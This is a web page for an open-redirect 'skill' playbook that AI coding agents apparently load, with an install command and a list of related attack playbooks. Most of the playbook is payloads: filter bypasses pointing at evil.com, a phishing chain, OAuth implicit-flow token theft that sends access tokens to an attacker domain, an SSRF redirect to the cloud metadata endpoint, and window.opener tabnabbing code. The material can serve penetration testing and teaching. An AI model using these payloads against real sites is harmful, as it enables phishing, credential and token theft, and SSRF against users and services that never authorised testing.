401-403-bypass-techniq…
401/403 bypass playbook. Use when encountering access-denied responses on admin panels, API endpoints, or restricted paths. Covers path manipulation, HTTP…
Open redirect playbook. Use when URL parameters, form actions, or JavaScript sinks control navigation targets and may redirect users to attacker-controlled destinations.
$ npx -y skills add yaklang/hack-skills --skill open-redirect --agent claude-codeHow it fires
How this skill gets triggered: by you, by Claude, or both.
/open-redirectContext preview
The summary Claude sees to decide when to auto-load this skill.
Open redirect playbook. Use when URL parameters, form actions, or JavaScript sinks control navigation targets and may redirect users to attacker-controlled destinations.
name: open-redirect description: >- Open redirect playbook. Use when URL parameters, form actions, or JavaScript sinks control navigation targets and may redirect users to attacker-controlled destinations.
> **AI LOAD INSTRUCTION**: Open redirect techniques. Covers parameter-based redirects, JavaScript sinks, filter bypass, and chaining with phishing, CSRF Referer bypass, OAuth token theft, and SSRF. Often underrated but critical for phishing and as a building block in multi-step exploit chains.
Open redirect occurs when an application redirects users to a URL derived from user input without validation. The trusted domain acts as a "launchpad" for phishing or token theft.
https://trusted.com/redirect?url=https://evil.com → User sees trusted.com in the link → clicks → lands on evil.com
---
?url= ?redirect= ?next= ?dest= ?destination= ?redir= ?return= ?returnUrl= ?go= ?forward= ?target= ?out= ?continue= ?link= ?view= ?to= ?ref= ?callback= ?path= ?rurl=
HTTP 301/302 Location header
PHP: header("Location: $input")
Python: redirect(input)
Java: response.sendRedirect(input)
Node: res.redirect(input)window.location = input window.location.href = input window.location.replace(input) window.open(input) document.location = input
---
| Validation | Bypass | |---|---| | Checks if URL starts with `/` | `//evil.com` (protocol-relative) | | Checks domain contains `trusted.com` | `evil.com?trusted.com` or `trusted.com.evil.com` | | Blocks `http://` | `//evil.com`, `https://evil.com`, `\/\/evil.com` | | Checks URL starts with `https://trusted.com` | `https://trusted.com@evil.com` (userinfo) | | Regex `^/[^/]` (relative only) | `/\evil.com` (backslash treated as path in some browsers) | | Django `endswith('target.com')` | `http://evil.com/www.target.com` — URL path ends with target domain | | Whitelist by domain suffix | Subdomain takeover on `*.trusted.com` |
# Protocol-relative: //evil.com # Userinfo bypass: https://trusted.com@evil.com # Backslash trick: /\evil.com /\/evil.com # URL encoding: https://trusted.com/%2F%2Fevil.com # Django endswith bypass: http://evil.com/www.target.com http://evil.com?target.com # Trusted site double-redirect (e.g., via Baidu link service): https://link.target.com/?url=http://evil.com # Special character confusion: http://evil.com#@trusted.com # fragment as authority http://evil.com?trusted.com # query string confusion http://trusted.com%00@evil.com # null byte truncation # Tab/newline in URL (browser ignores whitespace): java%09script:alert(1)
---
Attacker sends: `https://bigbank.com/redirect?url=https://bigbank-login.evil.com` Victim sees `bigbank.com` → clicks → enters credentials on clone site.
If OAuth `redirect_uri` allows open redirect on the authorized domain:
/authorize?redirect_uri=https://trusted.com/redirect?url=https://evil.com → Authorization code or token appended to evil.com URL → Attacker captures token from URL fragment or query
Some CSRF protections check `Referer` header contains trusted domain:
1. Attacker page links to: https://trusted.com/redirect?url=https://trusted.com/change-email 2. Redirect preserves Referer from trusted.com 3. CSRF protection passes because Referer = trusted.com
When server follows redirects:
?url=https://attacker.com/redirect-to-internal # attacker.com returns 302 → http://169.254.169.254/ # Server follows redirect → SSRF to metadata endpoint
---
□ Identify all URL parameters that trigger redirects □ Test external domain: ?url=https://evil.com □ Test protocol-relative: ?url=//evil.com □ Test userinfo bypass: ?url=https://trusted.com@evil.com □ Test backslash: ?url=/\evil.com □ Test JavaScript sink: ?url=javascript:alert(1) (DOM-based) □ Check OAuth flows for redirect_uri open redirect □ Verify if redirect preserves auth tokens in URL
---
When a link opens a new tab with `target="_blank"` WITHOUT `rel="noopener"`:
<!-- Vulnerable: --> <a href="https://external.com" target="_blank">Click here</a> <!-- Safe: --> <a href="https://external.com" target="_blank" rel="noopener noreferrer">Click here</a>
// On the attacker-controlled page (opened via target="_blank"):
if (window.opener) {
window.opener.location = "https://phishing.com/fake-login.html";
}---
In the implicit flow, the access token is returned in the URL fragment (`#access_token=...`). If `redirect_uri` allows an open redirect on the authorized domain:
/authorize?response_type=token &client_id=CLIENT &redirect_uri=https://target.com/callback/../redirect?url=https://evil.com &scope=read Flow: 1. User authenticates → authorization server redirects to: https://target.com/redirect?url=https://evil.com#access_token=SECRET 2. Open redirect fires → browser navigates to: https://evil.com#access_token=SECRET 3. Attacker page reads location
Master Entry → Category Entries → Deep Topic Skills One master entry, six category entries, and 102 deep topic skills across 14 security domains.
Repo: yaklang/hack-skills
401/403 bypass playbook. Use when encountering access-denied responses on admin panels, API endpoints, or restricted paths. Covers path manipulation, HTTP…
Active Directory ACL abuse playbook. Use when exploiting misconfigured AD permissions including GenericAll, WriteDACL, DCSync rights, shadow credentials, LAPS…
AD Certificate Services attack playbook. Use when targeting misconfigured AD CS for privilege escalation via ESC1-ESC13 template abuse, NTLM relay to…
Kerberos attack playbook for Active Directory. Use when targeting AD authentication via AS-REP roasting, Kerberoasting, golden/silver/diamond tickets,…
AI/ML security playbook. Use when assessing model supply chain attacks (pickle RCE, poisoned weights), adversarial examples, model poisoning, model stealing,…
Android pentesting playbook. Use when testing Android applications for SSL pinning bypass, exported component abuse, WebView vulnerabilities, intent…